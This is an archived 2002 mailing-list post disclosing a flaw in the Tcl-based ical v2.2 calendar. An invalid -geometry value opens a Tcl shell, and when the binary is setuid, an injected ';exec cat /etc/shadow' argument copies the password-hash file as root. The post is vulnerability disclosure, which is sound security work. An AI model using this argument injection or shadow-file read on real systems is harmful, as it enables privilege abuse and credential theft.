note: this post is about the ical program (ical v2.2) released by Sanjay Ghemawat, which is a calender applicaton. Please do not confuse this with iPlanet's iCal server. ical is program written in tcl. It seems that when executing the program with the -geometry option and an invalid value for geometry set, it drops a shell in where the program was executed. The shell which is executed is the tclsh (TCL Shell). The following is an example of this problem: [20:16] / $ ical -geometry invalidvalue Application initialization failed: bad geometry specifier "invalidvalue" % id uid=500(orion) gid=500(orion) groups=500(orion) % By default ical has the following permissions set: -rwxr-xr-x 1 root root 276216 Jul 31 2001 /usr/bin/ical-2.2 I decided to set the program setuid to see if the shell was executed after program completion as my user, or before program completion as root user. When I executed the program again in the same manner as I did before, I got the following: [20:16] / $ ical -geometry invalidvalue Application initialization failed: bad geometry specifier "invalidvalue" % id uid=500(orion) gid=500(orion) euid=0(root) groups=500(orion) % It seems to me that the program uses the uid which the program is using at this time is used to execute the shell. Since by default the program is not set-uid it is not much of a security issue although it seems strange to me that it would drop a shell. Sidenote: when using -geometry ";exec <whatever>" you are able to execute commands and the like. Next to "exec" other tcl shell commands such as "catch" and "set" can be used to manipulate variables. A quick example of this is (we're still set-uid here): [20:33] / $ ls -ail /tmp/shadowfile ls: /tmp/shadowfile: No such file or directory [20:33] / $ cat /etc/shadow cat: /etc/shadow: Permission denied [20:33] / $ ical -geometry ";exec cat /etc/shadow >> /tmp/shadowfile" [20:33] / $ ls -ail /tmp/shadowfile 277828 -rw-rw-r-- 1 root orion 969 Aug 18 20:33 /tmp/shadowfile The above was based on tcl v8.3 and ical v2.2. Possible other tcl-based programs may have the same issue, allowing an attacker to gain root access. Sorry if this issue has been posted before, just trying to find out if someone knows of similar issues or not. Cheers, Chris.
This archive was generated by hypermail 2b30 : Sat Mar 23 2002 - 13:27:44 PST